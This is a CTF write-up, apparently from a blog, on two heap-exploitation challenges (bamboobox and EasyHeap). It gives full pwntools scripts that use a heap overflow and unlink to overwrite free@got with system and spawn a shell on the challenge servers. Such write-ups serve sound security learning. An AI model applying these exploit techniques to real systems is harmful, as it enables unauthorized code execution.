【pwn】 hitcontrain_bamboobox && ZJCTF_19_EasyHeap

These two challenges are similar, so they are written up together.
Routine inspection
No PIE; the GOT is writable.
Program logic
The edit function has a heap overflow, and the heap pointers are stored in the .bss section, so the GOT can be read and written via unlink. Both programs originally have a backdoor, but its path was slightly wrong when deployed on the OJ, so we just try to get a shell.
bamboobox has a show function, which can leak a libc address.
EasyHeap only has the system function present in the program.

bamboobox

from pwn import *

io=remote('node3.buuoj.cn',28140)  # connection to the challenge instance on the CTF platform (host/port as published by the author)

def add(size,data):
    """Select menu option 2 (add item): answer the size prompt with *size* and
    the content prompt with *data* (sent without a trailing newline)."""
    replies = (
        ('choice:', '2'),
        ('name:', str(size)),
    )
    for prompt, line in replies:
        io.recvuntil(prompt)
        io.sendline(line)
    io.recvuntil('item:')
    io.send(data)

def free(idx):
    """Select menu option 4 (remove item) and answer the index prompt with *idx*."""
    replies = (
        ('choice:', '4'),
        ('index of item:', str(idx)),
    )
    for prompt, line in replies:
        io.recvuntil(prompt)
        io.sendline(line)

def edit(idx,size,data):
    """Select menu option 3 (change item): answer the index prompt with *idx*,
    the length prompt with *size*, then send *data* (no trailing newline).

    The writeup notes that this menu option has a heap overflow: the length
    given here is not checked against the item's allocated size."""
    replies = (
        ('of item:', str(idx)),
        ('item name:', str(size)),
    )
    io.recvuntil('choice:')
    io.sendline('3')
    for prompt, line in replies:
        io.recvuntil(prompt)
        io.sendline(line)
    io.recvuntil('the item:')
    io.send(data)

def show():
    """Select menu option 1 (show items); the caller reads the printed output."""
    prompt, choice = 'choice:', '1'
    io.recvuntil(prompt)
    io.sendline(choice)

# Fixed addresses taken from the binary; they are only usable because the
# program has no PIE and its GOT is writable (see the inspection notes above).
ptr=0x6020d8  # item pointer storage in .bss
puts_got=0x602020
free_got=0x602018

# Four items; the index comments are the author's. Item 3 holds the string
# that is handed to free() at the end.
add(0x30,'a')#0
add(0x30,'a')#1
add(0x80,'b')#2
add(0x80,'/bin/sh')#3

# Item 1 was created with 0x30 bytes but is edited with 0x100 — this is the
# heap overflow in edit described in the writeup, so the payload runs into
# item 2's chunk header. free(2) then triggers the unlink mentioned above,
# after which item 1's pointer presumably refers into the .bss pointer table.
edit(1,0x100,p64(0)+p64(0x31)+p64(ptr-0x18)+p64(ptr-0x10)+'a'*0x10+p64(0x30)+p64(0x90))
free(2)
# Rewrite the pointer table so that item 0 refers to puts@got, then show()
# prints it: the "0 : " line carries the leaked puts address (6 bytes).
edit(1,0x100,p64(0x30)+p64(puts_got))#1
show()
io.recvuntil('0 : ')
puts_add=u64(io.recv(6).ljust(8,'\x00'))  # NOTE: Python 2 idiom — ljust on bytes with a str fill fails on Python 3
print(hex(puts_add))
sys=puts_add-0x2a300  # hard-coded puts->system distance for the remote libc; specific to that libc build

# Same rewrite again, now pointing item 0 at free@got; editing item 0 writes
# system's address into the GOT entry, so free(3) on '/bin/sh' calls system.
edit(1,0x100,p64(0x30)+p64(free_got))
edit(0,0x100,p64(sys))
free(3)

io.interactive()

EasyHeap

from pwn import *

io=remote('node3.buuoj.cn',25111)  # connection to the challenge instance on the CTF platform (host/port as published by the author)

def add(size,data):
    """Select menu option 1 (create heap): answer the size prompt with *size*
    and the content prompt with *data* (sent without a trailing newline)."""
    replies = (
        ('choice :', '1'),
        ('Heap : ', str(size)),
    )
    for prompt, line in replies:
        io.recvuntil(prompt)
        io.sendline(line)
    io.recvuntil('heap:')
    io.send(data)

def edit(idx,size,data):
    """Select menu option 2 (edit heap): answer the index prompt with *idx*,
    the size prompt with *size*, then send *data* (no trailing newline).

    Per the writeup this option has a heap overflow: the size given here is
    not checked against the chunk's allocated size."""
    replies = (
        ('Index :', str(idx)),
        ('Heap : ', str(size)),
    )
    io.recvuntil('choice :')
    io.sendline('2')
    for prompt, line in replies:
        io.recvuntil(prompt)
        io.sendline(line)
    io.recvuntil('heap :')
    io.send(data)

def free(idx):
    """Select menu option 3 (delete heap) and answer the index prompt with *idx*."""
    replies = (
        ('choice :', '3'),
        ('Index :', str(idx)),
    )
    for prompt, line in replies:
        io.recvuntil(prompt)
        io.sendline(line)


# Fixed addresses taken from the binary (no PIE, writable GOT — see above).
# The program already contains a call to system, so its PLT stub can be used
# directly and no libc leak is needed (the writeup says there is no show).
free_got=0x0602018
sys_plt=0x0400700

ptr=0x6020E0+0x10  # heap pointer storage in .bss

# Five chunks; index comments are the author's. Item 4 holds the string that
# is handed to free() at the end.
add(0x30,'a')#0
add(0x30,'b')#1
add(0x30,'c')#2
add(0x80,'d')#3
add(0x60,'/bin/sh')#4

# Item 2 was created with 0x30 bytes but is edited with 0x100 — the heap
# overflow in edit described above — so the payload runs into item 3's chunk
# header. free(3) then triggers the unlink mentioned in the writeup, after
# which item 2's pointer presumably refers into the .bss pointer table.
edit(2,0x100,p64(0)+p64(0x31)+p64(ptr-0x18)+p64(ptr-0x10)+'a'*0x10+p64(0x30)+p64(0x90))
free(3)
# Rewrite the pointer table so that item 0 refers to free@got; editing item 0
# then writes system@plt into the GOT entry, so free(4) on '/bin/sh' calls system.
edit(2,0x100,p64(free_got)*2)
edit(0,0x100,p64(sys_plt))
free(4)

io.interactive()


Origin blog.csdn.net/github_36788573/article/details/104696070